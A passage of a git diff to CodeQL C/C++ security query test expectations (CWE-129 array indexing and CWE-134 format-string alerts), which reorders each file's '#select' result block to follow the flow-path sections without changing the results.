--- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected @@ -1,8 +1,3 @@ -#select -| test1.c:20:16:20:16 | i | test1.c:7:26:7:29 | **argv | test1.c:20:16:20:16 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:35:11:35:11 | i | test1.c:7:26:7:29 | **argv | test1.c:35:11:35:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:43:11:43:11 | i | test1.c:7:26:7:29 | **argv | test1.c:43:11:43:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:55:15:55:15 | j | test1.c:7:26:7:29 | **argv | test1.c:55:15:55:15 | j | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | edges | test1.c:7:26:7:29 | **argv | test1.c:8:11:8:14 | call to atoi | provenance | TaintFunction | | test1.c:8:11:8:14 | call to atoi | test1.c:9:9:9:9 | i | provenance | | 
@@ -35,3 +30,8 @@ nodes | test1.c:53:3:53:7 | ... = ... | semmle.label | ... = ... | | test1.c:55:15:55:15 | j | semmle.label | j | subpaths +#select +| test1.c:20:16:20:16 | i | test1.c:7:26:7:29 | **argv | test1.c:20:16:20:16 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:35:11:35:11 | i | test1.c:7:26:7:29 | **argv | test1.c:35:11:35:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:43:11:43:11 | i | test1.c:7:26:7:29 | **argv | test1.c:43:11:43:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:55:15:55:15 | j | test1.c:7:26:7:29 | **argv | test1.c:55:15:55:15 | j | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected index 79b6ff33410e..560ecc8bd775 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/SAMATE/UncontrolledFormatString.expected 
@@ -1,7 +1,3 @@ -#select -| char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | The value of this argument may come from $@ and is being used as a formatting argument to badVaSink(data), which calls vsnprintf(format). | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | buffer read by recv | -| char_console_fprintf_01_bad.c:49:21:49:24 | *data | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:49:21:49:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | string read by fgets | -| char_environment_fprintf_01_bad.c:36:21:36:24 | *data | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | an environment variable | edges | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:100:13:100:60 | ... = ... | provenance | | | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | provenance | | 
@@ -25,3 +21,7 @@ nodes | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | semmle.label | *call to getenv | | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | semmle.label | *data | subpaths +#select +| char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | char_connect_socket_w32_vsnprintf_01_bad.c:125:15:125:18 | *data | The value of this argument may come from $@ and is being used as a formatting argument to badVaSink(data), which calls vsnprintf(format). | char_connect_socket_w32_vsnprintf_01_bad.c:94:46:94:69 | recv output argument | buffer read by recv | +| char_console_fprintf_01_bad.c:49:21:49:24 | *data | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | char_console_fprintf_01_bad.c:49:21:49:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_console_fprintf_01_bad.c:30:23:30:35 | fgets output argument | string read by fgets | +| char_environment_fprintf_01_bad.c:36:21:36:24 | *data | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | char_environment_fprintf_01_bad.c:36:21:36:24 | *data | The value of this argument may come from $@ and is being used as a formatting argument to fprintf(format). | char_environment_fprintf_01_bad.c:27:30:27:35 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected index ca7aa17cf086..7b87c3ff440a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/argv/argvLocal.expected 
@@ -1,28 +1,3 @@ -#select -| argvLocal.c:95:9:95:15 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:96:15:96:21 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:96:15:96:21 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:101:9:101:10 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:101:9:101:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:102:15:102:16 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:102:15:102:16 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:106:9:106:13 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:106:9:106:13 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:107:15:107:19 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:107:15:107:19 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:110:9:110:11 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:110:9:110:11 | ** ... 
| The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:111:15:111:17 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:111:15:111:17 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:116:9:116:10 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:116:9:116:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:117:15:117:16 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:117:15:117:16 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:121:9:121:10 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:121:9:121:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:122:15:122:16 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:127:9:127:10 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:127:9:127:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:128:15:128:16 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:131:9:131:14 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:131:9:131:14 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:132:15:132:20 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:135:9:135:12 | *... ++ | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:135:9:135:12 | *... ++ | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:136:15:136:18 | *-- ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:136:15:136:18 | *-- ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:139:9:139:26 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:139:9:139:26 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:140:15:140:32 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:140:15:140:32 | *... 
? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:144:9:144:10 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:144:9:144:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:145:15:145:16 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:145:15:145:16 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:150:9:150:10 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:150:9:150:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | -| argvLocal.c:151:15:151:16 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:151:15:151:16 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | edges | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | provenance | | | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | provenance | | 
@@ -157,3 +132,28 @@ subpaths | argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:122:15:122:16 | printWrapper output argument | | argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:128:15:128:16 | printWrapper output argument | | argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:9:25:9:31 | *correct | argvLocal.c:132:15:132:20 | printWrapper output argument | +#select +| argvLocal.c:95:9:95:15 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:95:9:95:15 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:96:15:96:21 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:96:15:96:21 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:101:9:101:10 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:101:9:101:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:102:15:102:16 | *i1 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:102:15:102:16 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:106:9:106:13 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:106:9:106:13 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:107:15:107:19 | *access to array | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:107:15:107:19 | *access to array | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:110:9:110:11 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:110:9:110:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:111:15:111:17 | ** ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:111:15:111:17 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:116:9:116:10 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:116:9:116:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:117:15:117:16 | *i3 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:117:15:117:16 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:121:9:121:10 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:121:9:121:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:122:15:122:16 | *i4 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:122:15:122:16 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:127:9:127:10 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:127:9:127:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:128:15:128:16 | *i5 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:128:15:128:16 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:131:9:131:14 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:131:9:131:14 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:132:15:132:20 | *... + ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:132:15:132:20 | *... + ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:135:9:135:12 | *... ++ | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:135:9:135:12 | *... ++ | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:136:15:136:18 | *-- ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:136:15:136:18 | *-- ... 
| The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:139:9:139:26 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:139:9:139:26 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:140:15:140:32 | *... ? ... : ... | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:140:15:140:32 | *... ? ... : ... | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:144:9:144:10 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:144:9:144:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:145:15:145:16 | *i7 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:145:15:145:16 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:150:9:150:10 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:150:9:150:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | argvLocal.c:13:27:13:30 | **argv | a command-line argument | +| argvLocal.c:151:15:151:16 | *i8 | argvLocal.c:13:27:13:30 | **argv | argvLocal.c:151:15:151:16 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(correct), which calls printf(format). 
| argvLocal.c:13:27:13:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected index e853d5457f65..b5f6ad602fb8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/consts/NonConstantFormat.expected 
@@ -1,27 +1,3 @@ -#select -| consts.cpp:86:9:86:10 | *v1 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:86:9:86:10 | *v1 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:86:2:86:7 | call to printf | printf | -| consts.cpp:91:9:91:10 | *v2 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:91:9:91:10 | *v2 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:91:2:91:7 | call to printf | printf | -| consts.cpp:95:9:95:10 | *v3 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | -| consts.cpp:95:9:95:10 | *v3 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | -| consts.cpp:100:9:100:10 | *v4 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | -| consts.cpp:100:9:100:10 | *v4 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | -| consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:103:2:103:7 | call to printf | printf | -| consts.cpp:107:9:107:10 | *v5 | consts.cpp:106:13:106:19 | *call to varFunc | consts.cpp:107:9:107:10 | *v5 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:107:2:107:7 | call to printf | printf | -| consts.cpp:112:9:112:10 | *v6 | consts.cpp:111:7:111:13 | *call to varFunc | consts.cpp:112:9:112:10 | *v6 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:112:2:112:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | -| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | -| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | -| consts.cpp:130:9:130:10 | *v9 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | -| consts.cpp:130:9:130:10 | *v9 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | -| consts.cpp:135:9:135:11 | *v10 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:135:2:135:7 | call to printf | printf | -| consts.cpp:135:9:135:11 | *v10 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | -| consts.cpp:140:9:140:11 | *v11 | consts.cpp:139:13:139:16 | readString output argument | consts.cpp:140:9:140:11 | *v11 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:140:2:140:7 | call to printf | printf | -| consts.cpp:145:9:145:11 | *v12 | consts.cpp:144:16:144:18 | readStringRef output argument | consts.cpp:145:9:145:11 | *v12 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:145:2:145:7 | call to printf | printf | edges | consts.cpp:24:7:24:9 | **gv1 | consts.cpp:30:9:30:14 | *access to array | provenance | | | consts.cpp:24:7:24:9 | **gv1 | consts.cpp:123:2:123:12 | *... = ... | provenance | | 
@@ -93,3 +69,27 @@ nodes | consts.cpp:144:16:144:18 | readStringRef output argument | semmle.label | readStringRef output argument | | consts.cpp:145:9:145:11 | *v12 | semmle.label | *v12 | subpaths +#select +| consts.cpp:86:9:86:10 | *v1 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:86:9:86:10 | *v1 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:86:2:86:7 | call to printf | printf | +| consts.cpp:91:9:91:10 | *v2 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:91:9:91:10 | *v2 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:91:2:91:7 | call to printf | printf | +| consts.cpp:95:9:95:10 | *v3 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | +| consts.cpp:95:9:95:10 | *v3 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:95:9:95:10 | *v3 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:95:2:95:7 | call to printf | printf | +| consts.cpp:100:9:100:10 | *v4 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:100:2:100:7 | call to printf | printf | +| consts.cpp:100:9:100:10 | *v4 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:100:9:100:10 | *v4 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:100:2:100:7 | call to printf | printf | +| consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | consts.cpp:103:9:103:17 | *call to varFunc | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:103:2:103:7 | call to printf | printf | +| consts.cpp:107:9:107:10 | *v5 | consts.cpp:106:13:106:19 | *call to varFunc | consts.cpp:107:9:107:10 | *v5 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:107:2:107:7 | call to printf | printf | +| consts.cpp:112:9:112:10 | *v6 | consts.cpp:111:7:111:13 | *call to varFunc | consts.cpp:112:9:112:10 | *v6 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:112:2:112:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:116:9:116:13 | *access to array | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:116:9:116:13 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:116:2:116:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:7:90:10 | *call to gets | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:121:9:121:10 | *v8 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:121:9:121:10 | *v8 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:121:2:121:7 | call to printf | printf | +| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | +| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:126:9:126:30 | *call to 